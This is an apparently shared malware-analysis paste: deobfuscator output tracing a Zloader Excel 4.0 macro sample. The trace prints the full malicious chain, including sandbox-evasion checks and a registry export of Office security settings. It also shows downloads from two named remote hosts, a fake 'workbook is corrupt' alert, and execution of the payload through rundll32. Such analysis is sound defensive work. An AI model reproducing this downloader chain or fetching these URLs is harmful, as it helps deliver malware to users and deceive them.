dissectmalware

Zloader - a12b2ef9fe9c7be93533235d83af9b076446b0fb25e3fe16e0

May 16th, 2020
807
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.27 KB | None | 0 0
  1. xlmdeobfuscator -f "a12b2ef9fe9c7be93533235d83af9b076446b0fb25e3fe16e0b01f81b5a35144.xlsm" --no-ms-excel -n --day 15
  2.  
  3. The sample is converted from the following xls file: original 6f6ba7e59949cd4869f4cd3d63d556b86313b7e42d2030546426efbef20ee2c1 (shared by https://twitter.com/DynamicAnalysis)
  4.  
  5. [Loading Cells]
  6. auto_open: auto_openbkwak->Sheet2!$FS$52964
  7. [Starting Deobfuscation]
  8. CELL:FS52964 , FullEvaluation ,SET.VALUE(Sheet2!GM52449,"392")
  9. CELL:FS52965 , FullEvaluation ,GOTO(CV24412)
  10. CELL:CV24412 , FullEvaluation ,SET.VALUE(Sheet2!GQ44156,"339")
  11. CELL:CV24413 , FullEvaluation ,GOTO(GZ14878)
  12. CELL:GZ14878 , FullEvaluation ,SET.VALUE(Sheet2!HG1271,"1532")
  13. CELL:GZ14879 , FullEvaluation ,GOTO(CJ53865)
  14. CELL:CJ53865 , FullEvaluation ,SET.VALUE(Sheet2!AC30333,"35.75")
  15. CELL:CJ53866 , FullEvaluation ,GOTO(HO45111)
  16. CELL:HO45111 , FullEvaluation ,SET.VALUE(Sheet2!CS46407,"22")
  17. CELL:HO45112 , FullEvaluation ,GOTO(GX48167)
  18. CELL:GX48167 , FullEvaluation ,SET.VALUE(Sheet2!CI12245,"-59")
  19. CELL:GX48168 , FullEvaluation ,RUN(Sheet2!GG37317)
  20. CELL:GG37317 , FullEvaluation ,SET.VALUE(Sheet2!U1115,"-59")
  21. CELL:GG37318 , FullEvaluation ,GOTO(BS37166)
  22. CELL:BS37166 , FullEvaluation ,SET.VALUE(Sheet2!CN63602,"-406")
  23. CELL:BS37167 , FullEvaluation ,GOTO(X1129)
  24. CELL:X1129 , FullEvaluation ,SET.VALUE(Sheet2!BH34689,"127")
  25. CELL:X1130 , FullEvaluation ,RUN(Sheet2!HV59960)
  26. CELL:HV59960 , FullEvaluation ,SET.VALUE(Sheet2!BK21897,"-353.7")
  27. CELL:HV59961 , FullEvaluation ,RUN(Sheet2!GP29734)
  28. CELL:GP29734 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Sheet2!FK4625)
  29. CELL:GP29735 , FullEvaluation ,GOTO(EW24092)
  30. CELL:EW24092 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Sheet2!EW24093)
  31. CELL:EW24093 , NotImplemented ,APP.MAXIMIZE()
  32. CELL:EW24094 , FullEvaluation ,GOTO(IK5437)
  33. CELL:IK5437 , FullEvaluation ,FORMULA.FILL("=IF(GET.WINDOW(7),GOTO(R[-813]C[-78]),)",Sheet2!IK5438)
  34. CELL:IK5438 , FullBranching ,IF(GET.WINDOW(7),GOTO(R[-813]C[-78]),)
  35. CELL:IK5438 , FullEvaluation ,[TRUE] GOTO(R[-813]C[-78])
  36. CELL:FK4625 , End , CLOSE(FALSE)
  37. CELL:IK5438 , FullEvaluation ,[FALSE]
  38. CELL:IK5439 , FullEvaluation , GOTO(HS48810)
  39. CELL:HS48810 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(20),,GOTO(R[-44186]C[-60]))",Sheet2!HS48811)
  40. CELL:HS48811 , FullBranching , IF(GET.WINDOW(20),,GOTO(R[-44186]C[-60]))
  41. CELL:HS48811 , FullEvaluation , [TRUE]
  42. CELL:HS48812 , FullEvaluation , RUN(Sheet2!HL61953)
  43. CELL:HL61953 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(23)<3,GOTO(R[-57329]C[-53]),)",Sheet2!HL61954)
  44. CELL:HL61954 , FullBranching , IF(GET.WINDOW(23)<3,GOTO(R[-57329]C[-53]),)
  45. CELL:HL61954 , FullEvaluation , [TRUE] GOTO(R[-57329]C[-53])
  46. CELL:FK4625 , End , CLOSE(FALSE)
  47. CELL:HL61954 , FullEvaluation , [FALSE]
  48. CELL:HL61955 , FullEvaluation , GOTO(FT3448)
  49. CELL:FT3448 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(31),GOTO(R[1176]C[-9]),)",Sheet2!FT3449)
  50. CELL:FT3449 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[1176]C[-9]),)
  51. CELL:FT3450 , FullEvaluation , RUN(Sheet2!IL4383)
  52. CELL:IL4383 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,GOTO(R[241]C[-79]),)",Sheet2!IL4384)
  53. CELL:IL4384 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[241]C[-79]),)
  54. CELL:IL4384 , FullEvaluation , [TRUE] GOTO(R[241]C[-79])
  55. CELL:FK4625 , End , CLOSE(FALSE)
  56. CELL:IL4384 , FullEvaluation , [FALSE]
  57. CELL:IL4385 , FullEvaluation , RUN(Sheet2!IC43412)
  58. CELL:IC43412 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,GOTO(R[-38788]C[-70]),)",Sheet2!IC43413)
  59. CELL:IC43413 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[-38788]C[-70]),)
  60. CELL:IC43413 , FullEvaluation , [TRUE] GOTO(R[-38788]C[-70])
  61. CELL:FK4625 , End , CLOSE(FALSE)
  62. CELL:IC43413 , FullEvaluation , [FALSE]
  63. CELL:IC43414 , FullEvaluation , GOTO(AU41565)
  64. CELL:AU41565 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(19),,GOTO(R[-36941]C[120]))",Sheet2!AU41566)
  65. CELL:AU41566 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-36941]C[120]))
  66. CELL:AU41567 , FullEvaluation , RUN(Sheet2!AB17079)
  67. CELL:AB17079 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(42),,GOTO(R[-12455]C[139]))",Sheet2!AB17080)
  68. CELL:AB17080 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-12455]C[139]))
  69. CELL:AB17081 , FullEvaluation , GOTO(IB27416)
  70. CELL:IB27416 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-22792]C[-69]))",Sheet2!IB27417)
  71. CELL:IB27417 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-22792]C[-69]))
  72. CELL:IB27418 , FullEvaluation , RUN(Sheet2!ED65281)
  73. CELL:ED65281 , FullEvaluation , FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!EN14779)
  74. CELL:ED65282 , FullEvaluation , GOTO(IR35245)
  75. CELL:IR35245 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\0tDOFd.reg""",Sheet2!HQ57664)
  76. CELL:IR35246 , FullEvaluation , GOTO(DW28906)
  77. CELL:DW28906 , FullEvaluation , FORMULA.FILL("=R[2390]C[112]&GET.WORKSPACE(2)&""\Excel\Security ""&R[45275]C[193]&"" /y""",Sheet2!AF12389)
  78. CELL:DW28907 , FullEvaluation , GOTO(G52328)
  79. CELL:G52328 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Sheet2!AJ12831)
  80. CELL:G52329 , FullEvaluation , GOTO(GR56472)
  81. CELL:GR56472 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-43642]C[-164],R[-44084]C[-168],0,5)",Sheet2!GR56473)
  82. CELL:GR56473 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",AJ12831,AF12389,0,5)
  83. CELL:GR56474 , FullEvaluation , GOTO(BI831)
  84. CELL:BI831 , FullEvaluation , FORMULA.FILL("=WHILE(ISERROR(FILES(R[56830]C[164])))",Sheet2!BI834)
  85. CELL:BI832 , FullEvaluation , FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Sheet2!BI835)
  86. CELL:BI833 , FullEvaluation , FORMULA.FILL("=NEXT()",Sheet2!BI836)
  87. CELL:BI834 , PartialEvaluation , WHILE(None)
  88. CELL:BI835 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  89. CELL:BI836 , PartialEvaluation , NEXT()
  90. CELL:BI837 , FullEvaluation , RUN(Sheet2!HX58625)
  91. CELL:HX58625 , FullEvaluation , FORMULA.FILL("=FOPEN(R[-962]C[-7])",Sheet2!HX58626)
  92. CELL:HX58626 , PartialEvaluation , FOPEN(None)
  93. CELL:HX58627 , FullEvaluation , RUN(Sheet2!H59022)
  94. CELL:H59022 , FullEvaluation , FORMULA.FILL("=FPOS(R[-397]C[224],215)",Sheet2!H59023)
  95. CELL:H59023 , PartialEvaluation , FPOS(None,215)
  96. CELL:H59024 , FullEvaluation , RUN(Sheet2!HN6157)
  97. CELL:HN6157 , FullEvaluation , FORMULA.FILL("=FREAD(R[52468]C[10],255)",Sheet2!HN6158)
  98. CELL:HN6158 , PartialEvaluation , FREAD(None,255)
  99. CELL:HN6159 , FullEvaluation , GOTO(M12701)
  100. CELL:M12701 , FullEvaluation , FORMULA.FILL("=FCLOSE(R[45924]C[219])",Sheet2!M12702)
  101. CELL:M12702 , PartialEvaluation , FCLOSE(None)
  102. CELL:M12703 , FullEvaluation , GOTO(HS19468)
  103. CELL:HS19468 , FullEvaluation , FORMULA.FILL("=FILE.DELETE(R[38195]C[-2])",Sheet2!HS19469)
  104. CELL:HS19469 , NotImplemented , FILE.DELETE(R[38195]C[-2])
  105. CELL:HS19470 , FullEvaluation , RUN(Sheet2!IP58689)
  106. CELL:IP58689 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-52532]C[-28])),GOTO(R[-54065]C[-83]),)",Sheet2!IP58690)
  107. CELL:IP58690 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-52532]C[-28])),GOTO(R[-54065]C[-83]),)
  108. CELL:IP58691 , FullEvaluation , GOTO(IB46729)
  109. CELL:IB46729 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\Gqjxs.html""",Sheet2!GS57755)
  110. CELL:IB46730 , FullEvaluation , GOTO(CD35438)
  111. CELL:CD35438 , FullEvaluation , FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!EL60834)
  112. CELL:CD35439 , FullEvaluation , GOTO(CD16194)
  113. CELL:CD16194 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[44639]C[60],R[41560]C[119],0,0)",Sheet2!CD16195)
  114. CELL:CD16195 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,EL60834,GS57755,0,0)
  115. CELL:CD16196 , FullEvaluation , GOTO(GD27718)
  116. CELL:GD27718 , FullEvaluation , FORMULA.FILL("=FILES(R[30036]C[15])",Sheet2!GD27719)
  117. CELL:GD27719 , PartialEvaluation , FILES(None)
  118. CELL:GD27720 , FullEvaluation , RUN(Sheet2!HU9549)
  119. CELL:HU9549 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[18169]C[-43]),GOTO(R[-4925]C[-62]),)",Sheet2!HU9550)
  120. CELL:HU9550 , FullBranching , IF(ISERROR(R[18169]C[-43]),GOTO(R[-4925]C[-62]),)
  121. CELL:HU9550 , FullEvaluation , [TRUE] GOTO(R[-4925]C[-62])
  122. CELL:FK4625 , End , CLOSE(FALSE)
  123. CELL:HU9550 , FullEvaluation , [FALSE]
  124. CELL:HU9551 , FullEvaluation , GOTO(BH42792)
  125. CELL:BH42792 , FullEvaluation , SET.VALUE(Sheet2!CN33795,"84")
  126. CELL:BH42793 , FullEvaluation , RUN(Sheet2!HH59901)
  127. CELL:HH59901 , FullEvaluation , SET.VALUE(Sheet2!DO31023,"442")
  128. CELL:HH59902 , FullEvaluation , GOTO(FU9050)
  129. CELL:FU9050 , FullEvaluation , SET.VALUE(Sheet2!DW59946,"36.8")
  130. CELL:FU9051 , FullEvaluation , RUN(Sheet2!CC60398)
  131. CELL:CC60398 , FullEvaluation , SET.VALUE(Sheet2!G42604,"361")
  132. CELL:CC60399 , FullEvaluation , GOTO(IJ44508)
  133. CELL:IJ44508 , FullEvaluation , SET.VALUE(Sheet2!GB18553,"484")
  134. CELL:IJ44509 , FullEvaluation , GOTO(GI32034)
  135. CELL:GI32034 , FullEvaluation , SET.VALUE(Sheet2!CW23831,"-135.5")
  136. CELL:GI32035 , FullEvaluation , GOTO(D14697)
  137. CELL:D14697 , FullEvaluation , SET.VALUE(Sheet2!C63268,"494")
  138. CELL:D14698 , FullEvaluation , GOTO(AZ42808)
  139. CELL:AZ42808 , FullEvaluation , SET.VALUE(Sheet2!F39004,"235")
  140. CELL:AZ42809 , FullEvaluation , RUN(Sheet2!EB31800)
  141. CELL:EB31800 , FullEvaluation , SET.VALUE(Sheet2!GO1841,"-203")
  142. CELL:EB31801 , FullEvaluation , GOTO(EG40361)
  143. CELL:EG40361 , FullEvaluation , SET.VALUE(Sheet2!AA4633,"11")
  144. CELL:EG40362 , FullEvaluation , GOTO(IB20858)
  145. CELL:IB20858 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\8Z6V7u6.html""",Sheet2!BW44469)
  146. CELL:IB20859 , FullEvaluation , GOTO(DG24068)
  147. CELL:DG24068 , FullEvaluation , FORMULA.FILL("=""http://almakaaseb.com/wp-content/uploads/2020/05/wp-front.php""",Sheet2!BO49765)
  148. CELL:DG24069 , FullEvaluation , GOTO(ES45654)
  149. CELL:ES45654 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[37426]C[-87],R[32130]C[-79],0,0)",Sheet2!EX12339)
  150. CELL:ES45655 , FullEvaluation , RUN(Sheet2!DB59619)
  151. CELL:DB59619 , FullEvaluation , FORMULA.FILL("=FILES(R[27419]C[-152])",Sheet2!HS17050)
  152. CELL:DB59620 , FullEvaluation , GOTO(CH38558)
  153. CELL:CH38558 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[-24582]C[39]),,RUN(R[-36862]C[-17]))",Sheet2!GF41632)
  154. CELL:CH38559 , FullEvaluation , RUN(Sheet2!FE42412)
  155. CELL:FE42412 , FullEvaluation , FORMULA.FILL("=""https://neebank.com/wp-content/uploads/2020/05/wp-front.php""",Sheet2!AM24439)
  156. CELL:FE42413 , FullEvaluation , RUN(Sheet2!GL58286)
  157. CELL:GL58286 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-28190]C[-188],R[-8160]C[-152],0,0)",Sheet2!HS52629)
  158. CELL:GL58287 , FullEvaluation , RUN(Sheet2!D8257)
  159. CELL:D8257 , FullEvaluation , FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!FK27640)
  160. CELL:D8258 , FullEvaluation , GOTO(H50016)
  161. CELL:H50016 , FullEvaluation , FORMULA.FILL("=ALERT(R[22870]C[-4])",Sheet2!FO4770)
  162. CELL:H50017 , FullEvaluation , GOTO(FK5361)
  163. CELL:FK5361 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",Sheet2!BP21468)
  164. CELL:FK5362 , FullEvaluation , GOTO(HY30127)
  165. CELL:HY30127 , FullEvaluation , FORMULA.FILL("=R[24931]C[-64]&"",DllRegisterServer""",Sheet2!EI19538)
  166. CELL:HY30128 , FullEvaluation , GOTO(ES22445)
  167. CELL:ES22445 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[2101]C[-9],R[171]C[62],0,5)",Sheet2!BY19367)
  168. CELL:ES22446 , FullEvaluation , RUN(Sheet2!EX12339)
  169. CELL:EX12339 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,BO49765,BW44469,0,0)
  170. CELL:EX12340 , FullEvaluation , GOTO(HS17050)
  171. CELL:HS17050 , PartialEvaluation , FILES(None)
  172. CELL:HS17051 , FullEvaluation , GOTO(GF41632)
  173. CELL:GF41632 , FullBranching , IF(ISERROR(R[-24582]C[39]),,RUN(R[-36862]C[-17]))
  174. CELL:GF41632 , FullEvaluation , [TRUE]
  175. CELL:GF41633 , FullEvaluation , GOTO(AM24439)
  176. CELL:AM24439 , FullEvaluation , "https://neebank.com/wp-content/uploads/2020/05/wp-front.php"
  177. CELL:AM24440 , FullEvaluation , RUN(Sheet2!HS52629)
  178. CELL:HS52629 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://neebank.com/wp-content/uploads/2020/05/wp-front.php""",BW44469,0,0)
  179. CELL:HS52630 , FullEvaluation , RUN(Sheet2!FK27640)
  180. CELL:FK27640 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  181. CELL:FK27641 , FullEvaluation , RUN(Sheet2!FO4770)
  182. CELL:FO4770 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  183. CELL:FO4771 , FullEvaluation , GOTO(BP21468)
  184. CELL:BP21468 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  185. CELL:BP21469 , FullEvaluation , GOTO(EI19538)
  186. CELL:EI19538 , NotImplemented , BW44469,DllRegisterServer
  187. CELL:EI19539 , FullEvaluation , GOTO(BY19367)
  188. CELL:BY19367 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","BW44469,DllRegisterServer",0,5)
  189. CELL:BY19368 , FullEvaluation , GOTO(FK4625)
  190. CELL:FK4625 , End , CLOSE(FALSE)
  191. CELL:GF41632 , FullEvaluation , [FALSE] RUN(Sheet2!FO4770)
  192. CELL:FO4770 , PartialEvaluation , ALERT(None)
  193. CELL:FO4771 , FullEvaluation , GOTO(BP21468)
  194. CELL:BP21468 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  195. CELL:BP21469 , FullEvaluation , GOTO(EI19538)
  196. CELL:EI19538 , NotImplemented , BW44469,DllRegisterServer
  197. CELL:EI19539 , FullEvaluation , GOTO(BY19367)
  198. CELL:BY19367 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","BW44469,DllRegisterServer",0,5)
  199. CELL:BY19368 , FullEvaluation , GOTO(FK4625)
  200. CELL:FK4625 , End , CLOSE(FALSE)
  201. CELL:HS48811 , FullEvaluation , [FALSE] GOTO(R[-44186]C[-60])
  202. CELL:FK4625 , End , CLOSE(FALSE)
  203. time elapsed: 2.955113649368286
Add Comment
Please, Sign In to add comment